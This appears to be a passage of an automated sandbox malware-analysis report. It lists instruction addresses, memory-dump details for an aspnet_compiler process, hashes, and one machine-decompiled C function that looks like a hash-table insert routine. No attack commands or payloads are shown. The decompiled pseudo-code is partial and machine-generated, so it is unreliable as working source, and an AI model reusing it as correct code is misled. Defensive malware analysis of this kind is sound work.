                                                  0x019563d0
                                                  0x00000000
                                                  0x01955f70
                                                  0x01955f70
                                                  0x01955f91
                                                  0x01955f9c
                                                  0x01955f9e
                                                  0x01955fa4
                                                  0x01955fa6
                                                  0x0195638c
                                                  0x01956392
                                                  0x019563a1
                                                  0x019563a7
                                                  0x019563af
                                                  0x019563af
                                                  0x019563bd
                                                  0x019563d8
                                                  0x00000000
                                                  0x019563d8
                                                  0x01955fac
                                                  0x01955fb2
                                                  0x01955fb4
                                                  0x01955fbd
                                                  0x01955fc6
                                                  0x01955fce
                                                  0x01955fd4
                                                  0x01955fdc
                                                  0x01955fec
                                                  0x01955fed
                                                  0x01955fee
                                                  0x01955fef
                                                  0x01955ff9
                                                  0x01955ffa
                                                  0x01955ffb
                                                  0x01955ffc
                                                  0x01956000
                                                  0x01956004
                                                  0x01956012
                                                  0x01956012
                                                  0x01956018
                                                  0x01956019
                                                  0x0195601a
                                                  0x0195601b
                                                  0x0195601c
                                                  0x01956020
                                                  0x01956059
                                                  0x0195605c
                                                  0x01956061
                                                  0x01956061
                                                  0x01956022
                                                  0x01956022
                                                  0x01956022
                                                  0x01956025
                                                  0x0195602a
                                                  0x0195602b
                                                  0x01956031
                                                  0x01956037
                                                  0x01956038
                                                  0x0195603e
                                                  0x01956048
                                                  0x01956049
                                                  0x0195604a
                                                  0x0195604b
                                                  0x0195604c
                                                  0x0195604d
                                                  0x01956053
                                                  0x01956054
                                                  0x01956054
                                                  0x01956062
                                                  0x01956065
                                                  0x01956067
                                                  0x0195606a
                                                  0x01956070
                                                  0x01956075
                                                  0x01956076
                                                  0x01956081
                                                  0x01956087
                                                  0x01956095
                                                  0x01956099
                                                  0x0195609e
                                                  0x019560a4
                                                  0x019560ae
                                                  0x019560b0
                                                  0x019560b3
                                                  0x019560b6
                                                  0x019560b8
                                                  0x019560ba
                                                  0x019560ba
                                                  0x019560ba
                                                  0x019560ba
                                                  0x019560be
                                                  0x019560c0
                                                  0x019560c5
                                                  0x019560c5
                                                  0x019560c5
                                                  0x019560c6
                                                  0x019560cd
                                                  0x01956114
                                                  0x019560cf
                                                  0x019560cf
                                                  0x019560d4
                                                  0x019560d5
                                                  0x019560da
                                                  0x019560db
                                                  0x019560e1
                                                  0x019560e2
                                                  0x019560e8
                                                  0x019560f8
                                                  0x019560fd
                                                  0x019560fe
                                                  0x01956102
                                                  0x01956104
                                                  0x01956107
                                                  0x01956109
                                                  0x0195610b
                                                  0x0195610b
                                                  0x0195610b
                                                  0x0195610b
                                                  0x0195610f
                                                  0x0195610f
                                                  0x01956117
                                                  0x0195611a
                                                  0x0195611f
                                                  0x01956125
                                                  0x01956134
                                                  0x01956139
                                                  0x0195613f
                                                  0x01956146
                                                  0x01956148
                                                  0x0195614b
                                                  0x0195614d
                                                  0x0195614f
                                                  0x0195614f
                                                  0x0195614f
                                                  0x0195614f
                                                  0x01956153
                                                  0x01956159
                                                  0x01956159
                                                  0x0195615c
                                                  0x01956163
                                                  0x01956169
                                                  0x0195616c
                                                  0x01956172
                                                  0x01956181
                                                  0x01956186
                                                  0x01956187
                                                  0x0195618b
                                                  0x01956191
                                                  0x01956195
                                                  0x019561a3
                                                  0x019561bb
                                                  0x019561c0
                                                  0x019561c3
                                                  0x019561cc
                                                  0x019561d0
                                                  0x019561dc
                                                  0x019561de
                                                  0x019561e1
                                                  0x019561e4
                                                  0x019561e6
                                                  0x019561e8
                                                  0x019561e8
                                                  0x019561e8
                                                  0x019561e8
                                                  0x019561e6
                                                  0x019561ec
                                                  0x019561f3
                                                  0x01956203
                                                  0x01956209
                                                  0x0195620a
                                                  0x01956216
                                                  0x0195621d
                                                  0x01956227
                                                  0x01956241
                                                  0x01956246
                                                  0x0195624c
                                                  0x01956257
                                                  0x01956259
                                                  0x0195625c
                                                  0x0195625e
                                                  0x01956260
                                                  0x01956260
                                                  0x01956260
                                                  0x01956260
                                                  0x0195625e
                                                  0x01956264
                                                  0x01956267
                                                  0x01956269
                                                  0x01956315
                                                  0x01956315
                                                  0x0195631b
                                                  0x0195631e
                                                  0x01956324
                                                  0x01956327
                                                  0x0195632f
                                                  0x01956330
                                                  0x01956333
                                                  0x0195633a
                                                  0x0195633c
                                                  0x01956335
                                                  0x01956335
                                                  0x01956335
                                                  0x0195633f
                                                  0x01956342
                                                  0x0195634c
                                                  0x01956352
                                                  0x01956355
                                                  0x01956355
                                                  0x01956359
                                                  0x00000000
                                                  0x0195626f
                                                  0x01956275
                                                  0x01956275
                                                  0x01956278
                                                  0x0195627e
                                                  0x0195627e
                                                  0x01956281
                                                  0x01956287
                                                  0x0195628d
                                                  0x01956298
                                                  0x0195629c
                                                  0x019562a2
                                                  0x0195629e
                                                  0x0195629e
                                                  0x0195629e
                                                  0x019562a7
                                                  0x019562a7
                                                  0x019562aa
                                                  0x019562b0
                                                  0x019562f0
                                                  0x019562f0
                                                  0x019562f2
                                                  0x019562f8
                                                  0x019562fd
                                                  0x019562b2
                                                  0x019562b2
                                                  0x019562b2
                                                  0x019562b5
                                                  0x019562dd
                                                  0x019562e2
                                                  0x019562e5
                                                  0x019562b7
                                                  0x019562b8
                                                  0x019562bb
                                                  0x019562bd
                                                  0x019562c0
                                                  0x019562c4
                                                  0x019562cd
                                                  0x019562cd
                                                  0x019562c0
                                                  0x019562bb
                                                  0x019562b5
                                                  0x01956302
                                                  0x01956303
                                                  0x01956305
                                                  0x01956305
                                                  0x01956305
                                                  0x0195630c
                                                  0x0195630c
                                                  0x00000000
                                                  0x0195627e
                                                  0x01956269
                                                  0x01955eac
                                                  0x01955ebb
                                                  0x01955ebe
                                                  0x01955ecb
                                                  0x01955ecb
                                                  0x01955ece
                                                  0x01955ece
                                                  0x01955ed4
                                                  0x01955ed7
                                                  0x01955ed9
                                                  0x01955edb
                                                  0x01955edb
                                                  0x01955ee1
                                                  0x01955ee1
                                                  0x01955ee3
                                                  0x01955f20
                                                  0x01955f20
                                                  0x01955ee5
                                                  0x01955ee5
                                                  0x01955ee5
                                                  0x01955ee8
                                                  0x01955f11
                                                  0x01955f18
                                                  0x01955eea
                                                  0x01955eea
                                                  0x01955eed
                                                  0x01955ef2
                                                  0x01955ef8
                                                  0x01955efb
                                                  0x01955f0a
                                                  0x01955f0a
                                                  0x01955eed
                                                  0x01955ee8
                                                  0x01955f22
                                                  0x01955f28
                                                  0x00000000
                                                  0x00000000
                                                  0x01955f30
                                                  0x01955f31
                                                  0x01955f37
                                                  0x01955f3a
                                                  0x01955f3d
                                                  0x01955f44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01955f46
                                                  0x01955f48
                                                  0x01955f4d
                                                  0x00000000
                                                  0x01955f4d
                                                  0x01955dda
                                                  0x01955ddf
                                                  0x00000000
                                                  0x01955ddf
                                                  0x01955dd8
                                                  0x01955da7
                                                  0x01955da9
                                                  0x01955dac
                                                  0x01955dae
                                                  0x00000000
                                                  0x01955db4
                                                  0x01955db4
                                                  0x00000000
                                                  0x01955db4
                                                  0x01955dae
                                                  0x01955d88
                                                  0x01955d8d
                                                  0x01956363
                                                  0x01956369
                                                  0x0195636a
                                                  0x01956370
                                                  0x01956372
                                                  0x0195637a
                                                  0x0195637b
                                                  0x0195637d
                                                  0x00000000
                                                  0x00000000
                                                  0x0195637f
                                                  0x01956385
                                                  0x00000000
                                                  0x01956385
                                                  0x01955d38
                                                  0x01955d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01955d3b
                                                  0x01955d27
                                                  0x01955d29
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01956360
                                                  0x00000000
                                                  0x01956360
                                                  0x01955c10
                                                  0x01955c10
                                                  0x019563da
                                                  0x019563e5
                                                  0x019563e5

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c83bfcbd2a6f1143a4268235b14055cc34303d8d1a3504f0c578707552d3b05
                                                  • Instruction ID: 47068dd9a88b26d4be842c930c820b8db4fc7e7bc065b52e45d76b28b33b7af8
                                                  • Opcode Fuzzy Hash: 6c83bfcbd2a6f1143a4268235b14055cc34303d8d1a3504f0c578707552d3b05
                                                  • Instruction Fuzzy Hash: E6426C71D00229CFEB64CF68C880BA9BBB5FF45305F5581AAD94DEB242D734AA85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0195E824 Relevance: .5, Instructions: 493COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E0195E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x197d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L018AFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E018AFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x197b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E018A2280(E018CF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														L0189FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x197b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return L018CB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E018BF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x197b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x197b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = L0195E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(L0195E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(L0195E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E018AFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = L0195E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                  0x0195e833
                                                  0x0195e839
                                                  0x0195e83e
                                                  0x0195e841
                                                  0x0195e848
                                                  0x0195e84b
                                                  0x0195e851
                                                  0x0195e8b2
                                                  0x0195e8b2
                                                  0x0195e8b5
                                                  0x0195e90b
                                                  0x0195e911
                                                  0x0195e913
                                                  0x0195e913
                                                  0x0195e91a
                                                  0x0195e91d
                                                  0x0195e922
                                                  0x0195e924
                                                  0x0195e924
                                                  0x0195e924
                                                  0x0195e92f
                                                  0x0195e933
                                                  0x0195e935
                                                  0x0195e93a
                                                  0x0195e940
                                                  0x0195e948
                                                  0x0195e950
                                                  0x0195e955
                                                  0x00000000
                                                  0x00000000
                                                  0x0195e957
                                                  0x0195e95c
                                                  0x0195e9cb
                                                  0x0195e9d2
                                                  0x0195e9d4
                                                  0x0195e9f2
                                                  0x0195e9f6
                                                  0x0195ea10
                                                  0x0195ea18
                                                  0x0195ea1a
                                                  0x0195ea1f
                                                  0x0195ea2c
                                                  0x0195ea2d
                                                  0x0195ea2e
                                                  0x0195ea32
                                                  0x0195ea3d
                                                  0x0195ea42
                                                  0x0195ea45
                                                  0x0195ea51
                                                  0x0195ea60
                                                  0x0195ea65
                                                  0x0195ea68
                                                  0x0195ea6a
                                                  0x0195ea6a
                                                  0x0195ea6a
                                                  0x0195ea6f
                                                  0x0195ea76
                                                  0x0195ea7c
                                                  0x0195ea7e
                                                  0x0195ea81
                                                  0x0195ea85
                                                  0x0195ea88
                                                  0x0195ea8c
                                                  0x0195ea8f
                                                  0x0195ea93
                                                  0x0195ea98
                                                  0x00000000
                                                  0x00000000
                                                  0x0195ea9a
                                                  0x0195ea9d
                                                  0x0195eaa2
                                                  0x0195eb0e
                                                  0x0195eb15
                                                  0x0195eb17
                                                  0x0195eb33
                                                  0x0195eb36
                                                  0x0195eb39
                                                  0x0195eb3f
                                                  0x0195eb45
                                                  0x0195eb4a
                                                  0x0195eb52
                                                  0x0195ecb1
                                                  0x0195ecb9
                                                  0x0195ecbe
                                                  0x0195ecc3
                                                  0x0195ecc6
                                                  0x0195eceb
                                                  0x0195ecee
                                                  0x0195ecf9
                                                  0x0195ecfe
                                                  0x0195ed00
                                                  0x0195ed05
                                                  0x0195ed07
                                                  0x0195ed0a
                                                  0x0195ed0c
                                                  0x0195ed0e
                                                  0x0195ed12
                                                  0x0195ed19
                                                  0x0195ed1e
                                                  0x0195ed24
                                                  0x0195ed2a
                                                  0x0195ed2a
                                                  0x0195ed2c
                                                  0x0195ed3e
                                                  0x0195ed3e
                                                  0x0195eb5a
                                                  0x0195eb62
                                                  0x0195eb69
                                                  0x00000000
                                                  0x00000000
                                                  0x0195eb6f
                                                  0x0195eb75
                                                  0x0195eb79
                                                  0x0195eb79
                                                  0x0195eb88
                                                  0x0195eb8e
                                                  0x0195eb90
                                                  0x0195eb92
                                                  0x0195eb97
                                                  0x0195ed3f
                                                  0x0195ed45
                                                  0x00000000
                                                  0x00000000
                                                  0x0195ed4b
                                                  0x0195ed4e
                                                  0x00000000
                                                  0x0195eb9d
                                                  0x0195eb9d
                                                  0x0195eb9d
                                                  0x0195eba2
                                                  0x0195ebb5
                                                  0x0195ebbc
                                                  0x0195ebbe
                                                  0x0195ebbe
                                                  0x0195ebc3
                                                  0x0195ebc5
                                                  0x0195ebcb
                                                  0x0195ebd2
                                                  0x0195ebd5
                                                  0x0195ebdb
                                                  0x0195ebdf
                                                  0x0195ebe1
                                                  0x0195ebf0
                                                  0x0195ebf9
                                                  0x0195ec04
                                                  0x0195ec07
                                                  0x0195ec0a
                                                  0x0195ec82
                                                  0x0195ec85
                                                  0x0195ec8b
                                                  0x0195ec91
                                                  0x0195ec93
                                                  0x0195ec96
                                                  0x0195ec9b
                                                  0x0195eca6
                                                  0x0195ecac
                                                  0x0195ecae
                                                  0x0195ecae
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0195ec0c
                                                  0x0195ec0c
                                                  0x0195ec0c
                                                  0x0195ec0f
                                                  0x0195ec12
                                                  0x0195ec15
                                                  0x0195ec15
                                                  0x0195ec18
                                                  0x0195ec1e
                                                  0x00000000
                                                  0x00000000
                                                  0x0195ec22
                                                  0x0195ec28
                                                  0x0195ec4b
                                                  0x0195ec5b
                                                  0x0195ec5d
                                                  0x0195ec63
                                                  0x0195ec65
                                                  0x0195ec68
                                                  0x0195ec6b
                                                  0x0195ec6b
                                                  0x0195ec70
                                                  0x0195ec71
                                                  0x0195ec74
                                                  0x0195ec7d
                                                  0x00000000
                                                  0x0195ebe3
                                                  0x0195ebe3
                                                  0x0195ebe6
                                                  0x0195ebe6
                                                  0x0195ebe7
                                                  0x0195ebe9
                                                  0x0195ebec
                                                  0x00000000
                                                  0x0195ebe6
                                                  0x0195ebe1
                                                  0x0195eba4
                                                  0x0195eba9
                                                  0x0195ebb0
                                                  0x0195ebb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0195ebab
                                                  0x0195ebab
                                                  0x0195ebab
                                                  0x0195ebac
                                                  0x0195ebac
                                                  0x00000000
                                                  0x0195ebab
                                                  0x0195eb97
                                                  0x0195eb19
                                                  0x0195eb1c
                                                  0x0195eb21
                                                  0x0195eb26
                                                  0x0195eb2c
                                                  0x0195eb2c
                                                  0x00000000
                                                  0x0195eb26
                                                  0x0195ead6
                                                  0x0195ead9
                                                  0x0195eadc
                                                  0x0195eadc
                                                  0x0195eadc
                                                  0x0195eade
                                                  0x0195eae4
                                                  0x00000000
                                                  0x00000000
                                                  0x0195eaee
                                                  0x0195eaf7
                                                  0x0195eaf9
                                                  0x00000000
                                                  0x00000000
                                                  0x0195eb04
                                                  0x0195eb12
                                                  0x00000000
                                                  0x0195eb12
                                                  0x0195eb06
                                                  0x00000000
                                                  0x0195eb06
                                                  0x0195eaf0
                                                  0x0195eaf2
                                                  0x0195eaf4
                                                  0x00000000
                                                  0x0195eaf4
                                                  0x0195ea6a
                                                  0x0195ea21
                                                  0x00000000
                                                  0x0195ea21
                                                  0x0195e9d6
                                                  0x0195e9d6
                                                  0x0195e9e0
                                                  0x0195e9e2
                                                  0x0195e9e2
                                                  0x0195e9e8
                                                  0x00000000
                                                  0x0195e9e8
                                                  0x0195e987
                                                  0x0195e98f
                                                  0x0195e992
                                                  0x0195e995
                                                  0x0195e995
                                                  0x0195e998
                                                  0x0195e998
                                                  0x0195e99a
                                                  0x0195e9a0
                                                  0x00000000
                                                  0x00000000
                                                  0x0195e9a9
                                                  0x0195e9b2
                                                  0x0195e9b4
                                                  0x00000000
                                                  0x00000000
                                                  0x0195e9ba
                                                  0x0195e9c1
                                                  0x0195e9cf
                                                  0x00000000
                                                  0x0195e9cf
                                                  0x0195e9c3
                                                  0x00000000
                                                  0x0195e9c3
                                                  0x0195e9ab
                                                  0x0195e9ad
                                                  0x0195e9af
                                                  0x00000000
                                                  0x0195e9af
                                                  0x0195e924
                                                  0x0195e8b7
                                                  0x0195e8ba
                                                  0x0195e902
                                                  0x0195e908
                                                  0x0195e90a
                                                  0x00000000
                                                  0x0195e90a
                                                  0x0195e8bc
                                                  0x0195e8bf
                                                  0x0195e8f9
                                                  0x0195e8ff
                                                  0x0195e901
                                                  0x00000000
                                                  0x0195e901
                                                  0x0195e8c1
                                                  0x0195e8c4
                                                  0x0195e8f0
                                                  0x0195e8f6
                                                  0x0195e8f8
                                                  0x00000000
                                                  0x0195e8f8
                                                  0x0195e8c6
                                                  0x0195e8c9
                                                  0x0195e8e7
                                                  0x0195e8ed
                                                  0x0195e8ef
                                                  0x00000000
                                                  0x0195e8ef
                                                  0x0195e8cb
                                                  0x0195e8ce
                                                  0x0195e8de
                                                  0x0195e8e4
                                                  0x0195e8e6
                                                  0x00000000
                                                  0x0195e8e6
                                                  0x0195e8d3
                                                  0x00000000
                                                  0x0195e8d5
                                                  0x0195e8db
                                                  0x0195e8dd
                                                  0x00000000
                                                  0x0195e8dd
                                                  0x0195e853
                                                  0x0195e855
                                                  0x0195e85b
                                                  0x0195e85d
                                                  0x0195e897
                                                  0x0195e89c
                                                  0x0195e8a2
                                                  0x0195e8a6
                                                  0x0195e8ab
                                                  0x0195e8ad
                                                  0x0195e8ad
                                                  0x00000000
                                                  0x0195e85d

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 730ffd08800305ec212c2d20ef6b8d46bd092ac164f940107129237b4e545a11
                                                  • Instruction ID: c4102f52dfce7c94ee42af0921f3841f794cfd56f1a9b01e9753a01a126e39d8
                                                  • Opcode Fuzzy Hash: 730ffd08800305ec212c2d20ef6b8d46bd092ac164f940107129237b4e545a11
                                                  • Instruction Fuzzy Hash: 8502D672E006168BCB58CF6DC89067EFBF5EF88201B19456DD85AEB381D735EA01CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018A4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                  Download Yara Rule
